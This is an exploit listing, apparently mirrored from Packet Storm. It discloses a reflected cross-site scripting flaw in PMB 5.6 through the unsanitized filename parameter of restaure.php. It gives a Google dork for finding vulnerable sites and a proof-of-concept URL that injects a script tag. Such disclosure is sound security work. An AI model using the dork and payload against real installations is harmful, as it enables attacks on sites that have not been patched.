WHAT ARE YOU LOOKING FOR?

PMB 5.6 Cross Site Scripting ≈ Packet Storm

Exploits Affichages : 476

# Exploit Title: PMB 5.6 Cross Site Scripting XSS
# Google Dork: inurl:opac_css
# Date: 20-04-2020
# Exploit Author: 41-trk (Tarik Bakir)
# Email: tarikbak999[at]gmail.com
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6

-==== Vulnerability ====-

Variable $filename isn't properly sanitized in file /admin/sauvegarde/restaure.php.

-==== POC ====-

http://localhost/[PMB_PATH]//admin/sauvegarde/restaure.php?filename="><script>alert(1)</script>&critical=1

================================

Image
Back To Top

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"

Category

Popular Sections

About